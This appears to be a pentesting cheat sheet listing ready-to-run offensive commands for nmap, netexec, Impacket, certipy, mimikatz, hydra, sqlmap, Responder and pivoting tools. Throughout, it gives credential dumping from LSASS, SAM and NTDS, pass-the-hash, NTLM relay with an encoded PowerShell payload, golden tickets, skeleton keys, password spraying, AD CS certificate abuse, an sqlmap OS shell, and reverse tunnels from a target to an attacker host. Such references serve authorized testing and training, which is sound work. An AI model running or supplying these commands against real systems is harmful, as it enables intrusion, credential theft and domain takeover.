Pentesting Tools Cheat Sheet
# IMPORTANT TOOL NAMING UPDATES (2024+):
# netexec (nxc) — maintained successor to crackmapexec (deprecated 2023). Same syntax, different binary.
# certipy-ad — maintained successor to certipy by ly4k (archived). Same syntax, different pip package.
# BloodHound CE — Docker-based Community Edition, replaces legacy BloodHound + Neo4j setup.
#NMAP - SCAN RECIPES
# 1. Quick top-1000 TCP scan with default scripts + version detection (SYN scan when run as root, connect scan otherwise)
nmap -sC -sV -oA scan 10.10.10.5
# 2. Full TCP port scan + service detection
nmap -p- --min-rate 1000 -sV -sC -oA full_tcp 10.10.10.5
# 3. UDP top ports scan
nmap -sU --top-ports 200 --min-rate 500 -oA udp 10.10.10.5
# 4. Stealth SYN with OS detection
nmap -sS -O -sV -sC -oA stealth_os 10.10.10.5
# 5. Script scan for vulnerabilities
nmap -sV --script vuln -p 80,443,445,8080 10.10.10.5
# 6. SMB enumeration scripts
nmap -p 445 --script=smb-enum-shares,smb-enum-users,smb-os-discovery 10.10.10.5
# Useful flags
# -Pn skip host discovery (treat all as up)
# -T4 faster timing
# -oA name output all formats (gnmap, nmap, xml)
# --open show only open ports
# -iL hosts.txt import list of targets
# --script-help=* list all scripts
# Nmap NSE vulnerability scripts
nmap --script smb-vuln-ms17-010 -p 445 <target> # EternalBlue check
nmap --script ssl-heartbleed -p 443 <target> # Heartbleed check
nmap --script ssl-poodle -p 443 <target> # POODLE check
nmap --script "http-vuln*" -p 80,443 <target> # All HTTP vuln scripts (quote the glob so the shell does not expand it)
nmap --script rdp-vuln-ms12-020 -p 3389 <target> # MS12-020 RDP check (this is not a BlueKeep check)
nmap --script redis-info -p 6379 <target> # Redis info
nmap --script ldap-rootdse -p 389 <target> # LDAP root DSE
nmap --script ms-sql-info -p 1433 <target> # MSSQL info
nmap --script dns-zone-transfer -p 53 <target> # DNS zone transfer
nmap --script-args smbusername=user,smbpassword=pass # Pass args to scripts
#NETEXEC (NXC) - KEY MODULES
# SMB
netexec smb 10.10.10.5 -u user -p pass # check creds
netexec smb 10.10.10.5 -u user -p pass --shares # list shares
netexec smb 10.10.10.5 -u user -p pass --users # enumerate users
netexec smb 10.10.10.0/24 -u user -p pass --local-auth # local auth
netexec smb targets.txt -u '' -p '' --shares # null session
netexec smb 10.10.10.5 -u user -H 'NTHASH' --shares # pass-the-hash
netexec smb 10.10.10.5 -u user -p pass -x 'whoami' # execute command
netexec smb 10.10.10.5 -u user -p pass -M lsassy # dump lsass
netexec smb 10.10.10.5 -u user -p pass -M spider_plus # spider shares
netexec smb 10.10.10.5 -u user -p pass --local-groups # local groups
netexec smb 10.10.10.5 -u user -p pass --rid-brute # RID brute
netexec smb 10.10.10.5 -u user -p pass --sam # dump SAM
netexec smb 10.10.10.5 -u user -p pass --lsa # dump LSA secrets
# LDAP
netexec ldap 10.10.10.5 -u user -p pass # validate creds
netexec ldap 10.10.10.5 -u user -p pass --users # dump users
netexec ldap 10.10.10.5 -u user -p pass --groups # dump groups
netexec ldap 10.10.10.5 -u user -p pass -M adcs # AD CS enumerate
netexec ldap 10.10.10.5 -u user -p pass -M laps # LAPS check
netexec ldap 10.10.10.5 -u user -p pass --trusted-for-delegation
netexec ldap 10.10.10.5 -u user -p pass --kerberoasting kerberoast.txt
netexec ldap 10.10.10.5 -u user -p pass --asreproast asrep.txt
# WinRM
netexec winrm 10.10.10.5 -u user -p pass # test WinRM
netexec winrm 10.10.10.5 -u user -p pass -x 'whoami' # execute
netexec winrm 10.10.10.5 -u user -p pass --local-auth
# MSSQL
netexec mssql 10.10.10.5 -u sa -p password # test creds
netexec mssql 10.10.10.5 -u sa -p password -M mssql_priv # check privs
netexec mssql 10.10.10.5 -u sa -p password -x 'whoami' # xp_cmdshell
# Spraying
netexec smb 10.10.10.0/24 -u users.txt -p 'Summer2024!' --continue-on-success # quote passwords containing shell metacharacters
netexec smb 10.10.10.0/24 -u user -p passwords.txt --no-bruteforce
# Additional NetExec modules:
nxc smb <target> -u user -p pass --sam # Remote SAM dump
nxc smb <target> -u user -p pass --lsa # LSA secrets dump
nxc smb <target> -u user -p pass --ntds # NTDS dump
nxc smb <target> -u user -p pass --dpapi # DPAPI keys dump
nxc smb <target> -u user -p pass --disks # List disk drives
nxc smb <target> -u user -p pass --sessions # Active sessions
nxc smb <target> -u user -p pass --loggedon-users # Logged-on users
nxc smb <target> -u user -p pass --password-policy # Password policy
nxc smb <target> -u user -p pass --local-auth # Local auth (not domain)
nxc smb <target> -u user -p pass -M lsassy # Remote LSASS dump
# LDAP modules:
nxc ldap <target> -u user -p pass --gmsa # gMSA password read
nxc ldap <target> -u user -p pass -M laps # LAPS password extract
nxc ldap <target> -u user -p pass -M delegation # Find delegation types
#IMPACKET TOOLS
# Remote execution
impacket-psexec domain.local/user:pass@10.10.10.5
impacket-psexec domain/user@10.10.10.5 -hashes :NTHASH # no password when passing a hash
impacket-wmiexec domain/user:pass@10.10.10.5
impacket-wmiexec domain/user@10.10.10.5 -hashes :NTHASH
impacket-smbexec domain/user:pass@10.10.10.5
impacket-atexec domain/user:pass@10.10.10.5 "whoami"
# Credential dumping
impacket-secretsdump domain/user:pass@10.10.10.5
impacket-secretsdump -sam sam.hive -system system.hive LOCAL
impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL
impacket-secretsdump -just-dc-user administrator domain/user:pass@DC
impacket-secretsdump -hashes :NTHASH domain/user@DC
# Kerberos
impacket-GetNPUsers domain.local/ -usersfile users.txt -no-pass -dc-ip 10.10.10.5
impacket-GetNPUsers domain.local/user -no-pass -dc-ip 10.10.10.5 -request -outputfile hashes.asreproast
impacket-GetUserSPNs domain.local/user:pass -dc-ip 10.10.10.5 -request
impacket-GetUserSPNs domain.local/user -hashes :NTHASH -dc-ip 10.10.10.5 -request -outputfile kerberoast.txt
impacket-getTGT domain.local/user:pass -dc-ip 10.10.10.5
impacket-getTGT domain.local/user -hashes :NTHASH -dc-ip 10.10.10.5
export KRB5CCNAME=user.ccache && impacket-psexec -k -no-pass domain.local/user@TARGET
impacket-ticketer ... # forge silver/golden ticket (see notes)
impacket-ticketConverter ticket.kirbi ticket.ccache # convert ticket format
# Misc
impacket-ntlmrelayx -tf targets.txt -smb2support
impacket-ntlmrelayx -tf targets.txt -smb2support -c "powershell -enc BASE64"
impacket-smbserver share . -smb2support
impacket-rpcdump @10.10.10.5
impacket-samrdump domain/user:pass@10.10.10.5
impacket-lookupsid domain/user:pass@10.10.10.5
# Impacket ntlmrelayx — common attack modes
impacket-ntlmrelayx -tf targets.txt -smb2support -adcs # ADCS certificate enrollment relay
impacket-ntlmrelayx -tf targets.txt -smb2support -t ldap://dc01 --delegate-access # RBCD via LDAP relay
impacket-ntlmrelayx -tf targets.txt -smb2support --add-computer # Auto machine account via LDAP relay
impacket-ntlmrelayx -tf targets.txt -smb2support -i # Interactive SMB shell
impacket-ntlmrelayx -tf targets.txt -smb2support -t mssql://target # MSSQL shell
impacket-ntlmrelayx -tf targets.txt -smb2support -socks # SOCKS proxy mode (use with proxychains)
impacket-ntlmrelayx -tf targets.txt -smb2support -6 # IPv6 relay (with mitm6)
#BLOODHOUND COLLECTORS
# SharpHound (on target, PowerShell)
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -ZipFileName out.zip
Invoke-BloodHound -CollectionMethod DCOnly -ZipFileName dc.zip
Invoke-BloodHound -CollectionMethod LoggedOn,Session,Group
# SharpHound.exe (on target, C#)
SharpHound.exe -c All --zipfilename out.zip
SharpHound.exe -c Sessions,LoggedOn -d domain.local
# BloodHound-python (from attacker, via LDAP)
bloodhound-python -d domain.local -u user -p pass -c All -ns 10.10.10.5
bloodhound-python -d domain.local -u user -p pass -c DCOnly,Session -dc DC.domain.local
bloodhound-python -d domain.local -u user -p pass --dns-tcp --collectionmethod All
# Start neo4j + BloodHound GUI
sudo neo4j console
bloodhound
# BloodHound CE (Community Edition) — Docker deployment (2024+ standard)
curl -L https://github.com/SpecterOps/bloodhound-ce/raw/main/docker-compose.yml -o docker-compose.yml
docker compose up -d
# Access: http://localhost:8080 | Initial creds: admin / the random initial password printed in the bloodhound container log on first start (change on first login)
# SharpHound CE collector built into the web UI
# Legacy BloodHound uses: sudo neo4j console → bloodhound (http://localhost:7474)
#EVIL-WINRM
# Connect with password
evil-winrm -i 10.10.10.5 -u administrator -p 'Passw0rd!'
evil-winrm -i 10.10.10.5 -u user -p 'pass' -s /opt/scripts # scripts dir
# Pass-the-hash
evil-winrm -i 10.10.10.5 -u administrator -H 'NTHASH'
# SSL
evil-winrm -i 10.10.10.5 -u user -p pass -S
# File transfer
upload /local/path/nc.exe C:\Windows\Temp\nc.exe
download C:\Windows\Temp\sam.hive /local/path/sam.hive
# Bypass AMSI
evil-winrm -i 10.10.10.5 -u user -p pass -s /usr/share/evil-winrm/examples
# Built-in menu (in shell)
menu
Bypass-4MSI
Invoke-Binary /opt/mimikatz.exe
# Additional evil-winrm flags:
evil-winrm -i 10.10.10.10 -u user -p pass -s /opt/scripts # Load scripts path
evil-winrm -i 10.10.10.10 -u user -p pass -e /opt/exts # Load extensions path
evil-winrm -i 10.10.10.10 -u user -p pass -S # SSL connection
evil-winrm -i 10.10.10.10 -u user -p pass --timeout 30 # Longer timeout for slow targets
#HASHCAT HASH MODES TABLE
Mode Hash Type
0 MD5
100 SHA1
500 md5crypt (Unix)
1000 NTLM
1400 SHA-256
1700 SHA-512
1800 sha512crypt $6$ (Unix)
3000 LM
3200 bcrypt $2*$ (Unix)
5500 NetNTLMv1
5600 NetNTLMv2
7300 IPMI2 RAKP HMAC-SHA1
7500 Kerberos 5 AS-REQ Pre-Auth etype 23
13100 Kerberos 5 TGS-REP etype 23 (kerberoasting)
13400 Keepass 1/2
13600 WinZip
13711 VeraCrypt SHA256 XTS 512
16700 FileVault 2
16800 WPA-PMKID-PBKDF2
16801 WPA-PMKID-PMK
18200 Kerberos 5 AS-REP etype 23 (AS-REP roasting)
19600 Kerberos 5 TGS-REP etype 17
19700 Kerberos 5 TGS-REP etype 18
22000 WPA-PBKDF2-PMKID+EAPOL
22001 WPA-PMK-PMKID+EAPOL
#JOHN FORMATS (MATCHING HASHCAT)
# Common John hash formats
john --list=formats | grep -i ntlm
john --list=formats | grep -i kerberos
# Format names
john hash.txt --format=NT # NTLM
john hash.txt --format=LM # LM
john hash.txt --format=Raw-MD5 # MD5
john hash.txt --format=Raw-SHA1 # SHA1
john hash.txt --format=Raw-SHA256 # SHA-256
john hash.txt --format=krb5tgs # Kerberos TGS (kerberoasting)
john hash.txt --format=krb5asrep # AS-REP (asreproast)
john hash.txt --format=netntlmv2 # NetNTLMv2
john hash.txt --format=bcrypt # bcrypt
john hash.txt --format=sha512crypt # Unix $6$
# Cracking
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john --rules=best64 --wordlist=rockyou.txt hash.txt
john --show hash.txt
#SQLMAP RECIPES
# GET request
sqlmap -u "http://target/page.php?id=1" --batch
sqlmap -u "http://target/page.php?id=1" --dbs
sqlmap -u "http://target/page.php?id=1" -D dbname --tables
sqlmap -u "http://target/page.php?id=1" -D dbname -T users --dump
sqlmap -u "http://target/page.php?id=1" -D dbname -T users -C username,password --dump
# POST request
sqlmap -u "http://target/login.php" --data="user=admin&pass=test" --dbs
# Request from file (Burp-saved request)
sqlmap -r request.txt --batch
sqlmap -r request.txt -p parameter --dbs
# OS shell (requires dba privileges)
sqlmap -u "http://target/page.php?id=1" --os-shell
# Fingerprint only
sqlmap -u "http://target/page.php?id=1" --fingerprint
sqlmap -u "http://target/page.php?id=1" --current-user --is-dba
# Useful flags
# --level=3 --risk=2 increase test depth
# --tamper=space2comment WAF bypass tamper scripts
# --threads=10 parallel threads
# --batch non-interactive
# --force-ssl
# --proxy=http://127.0.0.1:8080
#HYDRA EXAMPLES
# SSH
hydra -l root -P passwords.txt ssh://10.10.10.5
hydra -L users.txt -P rockyou.txt 10.10.10.5 ssh
# HTTP POST login
hydra -l admin -P passwords.txt 10.10.10.5 http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid"
hydra -L users.txt -p password 10.10.10.5 http-post-form "/login:user=^USER^&pass=^PASS^:F=Login failed"
# SMB
hydra -l administrator -P passwords.txt 10.10.10.5 smb
# RDP
hydra -l administrator -P passwords.txt 10.10.10.5 rdp
# FTP
hydra -L users.txt -P passwords.txt ftp://10.10.10.5
# MySQL
hydra -l root -P passwords.txt 10.10.10.5 mysql
# WinRM (hydra ships no winrm service module; for WinRM spraying use netexec winrm instead)
hydra -l administrator -P passwords.txt 10.10.10.5 winrm
# Useful flags
# -t 4 reduce threads to avoid lockouts
# -f stop after first successful login
# -vV verbose (show attempts)
# -s 2222 custom port
# -o results.txt output file
#TUNNELING / PIVOTING
# Chisel (attacker server)
chisel server -p 8000 --reverse
# Chisel (target client)
.\chisel.exe client 10.10.14.5:8000 R:socks # SOCKS proxy
.\chisel.exe client 10.10.14.5:8000 R:1080:socks # specific SOCKS port
.\chisel.exe client 10.10.14.5:8000 R:8888:127.0.0.1:80 # single port forward
.\chisel.exe client 10.10.14.5:8000 R:3389:10.10.10.6:3389 # pivot to other host
# Ligolo-ng (attacker)
sudo ip tuntap add user $USER mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 10.10.10.0/24 dev ligolo
ligolo-proxy -selfcert
# Ligolo-ng (target)
ligolo-agent -connect 10.10.14.5:11601 -ignore-cert
# SSH tunneling
ssh -L 8080:localhost:80 user@target # local port forward
ssh -R 8080:localhost:80 user@attacker # remote port forward
ssh -D 1080 user@target # dynamic SOCKS proxy
ssh -J user@pivot:22 user@target # jump host
# Proxychains
tail /etc/proxychains4.conf # make sure socks5 127.0.0.1 1080 (chisel's R:socks listener is SOCKS5)
proxychains nmap -sT -Pn -p 80,445 10.10.10.6
proxychains netexec smb 10.10.10.6 -u user -p pass
#CERTIPY COMMANDS
# AD CS enumeration
certipy find -dc-ip 10.10.10.5 -u user@domain.local -p pass -vulnerable
certipy find -dc-ip 10.10.10.5 -u user@domain.local -p pass -enabled
# Common ESC attacks
certipy req -u user@domain.local -p pass -ca 'CA-Name' -target DC.domain.local -template ESC1 -upn administrator
certipy req -u user@domain.local -p pass -ca 'CA-Name' -target DC.domain.local -template ESC1 -dns DC.domain.local
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.5
# ESC8 (Web Enrollment relay)
certipy relay -ca CA-NAME -template DomainController
# TGT via certificate
certipy req -u user@domain.local -p pass -target-ip 10.10.10.5 -ca CA-NAME -template User
certipy auth -pfx user.pfx -dc-ip 10.10.10.5
# certipy-ad ESC commands (certipy-ad is the 2024+ maintained fork of certipy)
certipy find -u user@domain.local -p pass -dc-ip 10.10.10.10 -enabled # Find enabled templates
# ESC1: Client authentication + enrollee supplies subject
certipy req -u user@domain.local -p pass -ca CA-NAME -template ESC1 -upn administrator@domain.local
# ESC2: Misconfigured Enrollee Supplies Subject (any EKU)
certipy req -u user@domain.local -p pass -ca CA-NAME -template ESC2 -dns target.domain.local
# ESC3: Certificate Enrollment Agent
certipy req -u user@domain.local -p pass -ca CA-NAME -template ESC3 -enrollee administrator@domain.local
# ESC4: Vulnerable Certificate Template Access Control
certipy template -u user@domain.local -p pass -template ESC4 -save
# ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2 flag set on the CA (enrollee can supply a SAN on any template)
certipy req -u user@domain.local -p pass -ca CA-NAME -template ESC6 -upn administrator@domain.local
# ESC7: Vulnerable CA Access Control
certipy ca -u user@domain.local -p pass -ca CA-NAME -add-officer user
# ESC8: NTLM Relay to ADCS
impacket-ntlmrelayx -t adcs://10.10.10.10 -smb2support
# ESC9: No Security Extension (combined with strong certificate mapping)
certipy req -u user@domain.local -p pass -ca CA-NAME -template ESC9
# ESC15: Application Policy (new in 2024)
certipy req -u user@domain.local -p pass -ca CA-NAME -template ESC15 -application-policies "1.3.6.1.5.5.7.3.2"
#MIMIKATZ KEY COMMANDS
# On target, run as admin
privilege::debug
token::elevate
# Dump credentials
sekurlsa::logonpasswords # dump all logon passwords
sekurlsa::wdigest # WDigest credentials
sekurlsa::kerberos # Kerberos tickets
sekurlsa::tickets /export # export tickets to .kirbi
lsadump::sam # dump SAM
lsadump::lsa /patch # dump password hashes via LSA (all domain hashes when run on a DC)
lsadump::secrets # dump LSA secrets (service account passwords etc.); cached domain creds are lsadump::cache
lsadump::dcsync /user:krbtgt # DCSync krbtgt hash
# Pass-the-hash
sekurlsa::pth /user:administrator /domain:domain.local /ntlm:NTHASH /run:cmd.exe
# Pass-the-ticket
kerberos::ptt ticket.kirbi
# Golden ticket
kerberos::golden /user:fakeadmin /domain:domain.local /sid:S-1-5-21-XXX /krbtgt:KRBTGT_NTHASH /id:500
# Misc
token::list
token::elevate /domainadmin
vault::list
misc::skeleton # skeleton key (domain admin, very noisy)
#RESPONDER — NTLM CAPTURE AND POISONING
# Responder — NTLM capture and poisoning
sudo responder -I tun0 -dwP # WPAD + forced proxy auth (-d meaning varies by version; DHCP answers in Responder 3.x)
sudo responder -I tun0 -wrf # WPAD + fingerprint
sudo responder -I tun0 -b # Basic HTTP auth (yields cleartext creds instead of NTLM; this is not an NTLMv1 downgrade)
# When using ntlmrelayx, disable Responder SMB/HTTP servers:
# Edit /etc/responder/Responder.conf: SMB=Off, HTTP=Off